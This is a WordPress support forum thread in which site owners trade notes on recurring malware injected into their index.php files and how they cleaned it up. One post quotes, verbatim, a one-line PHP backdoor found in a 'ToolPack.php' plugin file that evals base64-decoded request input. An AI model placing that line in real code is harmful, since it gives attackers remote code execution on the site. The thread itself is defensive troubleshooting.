webtechdev
Member
Posted 1 year ago #
Below Malware script attacked my sites . i removed it more that 15 times but it is coming again and again . Changing the ftp passwords in 2 hour once but no use . help me to remove this script and stop its routine attack .
[Code moderated. Don't post hack code here.]
Me Too! Ours looks the same man! Help us! >_<
[Code moderated. Don't post hack code here.]
Nothing seems to be infected while checking for rootkits, is this new?
Used chkrootkit-0.49
webtechdev
Member
Posted 1 year ago #
@rgat basically my each and every index.php file na matter which directory it is locatd code auto past in to top of index file .
i set the permission to recommended 755 dir 644file not it stop pasting the code but stiil em worried about what is happening !! anyone help us.
MickeyRoush
Member
Posted 1 year ago #
webtechdev
Member
Posted 1 year ago #
@MickeyRoush
i checked most of the links.
but now i installed a fresh copy for test what is happening.
after uploading what i have seen is hacking code is there on top of the site.
don't no what is happening.
I have the same issue, all my index.php are keep on being injected with the malicious code.
I found an old plugin folder that i have uninstalled in the past, the folder is empty except to a file called ToolPack.php and it had a line of code:
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
I have removed the folder and now i am waiting to see if the malicious code is back.
I have found out that this is could be the backdoor:
http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
Will update you soon
Thanks a lot for all the replies, I'll try doing the suggestions you replied here.
Kindest Regards,
rgat
Hi All,
Just reporting that it was timthumb/blackhole exploit and I do not know anymore how to fix it. In the end my boss hired a security expert to fix this.
But it looks like they are also having difficulties. Do you think re-installing everything to a different server will fix this?
Best Regards,
Randy A.
webtechdev
Member
Posted 1 year ago #
@rgat
thanks for updating more regarding topic.
secondly i heard about tool pack plugin which is one line plugin
and causing some other people site as well and they mentioned this.
After removing this plugin everything is working perfectly and i upgrade 7 blogs as well which are out-dated.
simple tips
upgrade blog + plugins
apply recommend file permission
-install file monitoring plugin to keep eye on file and
-install firewall plugin
thanks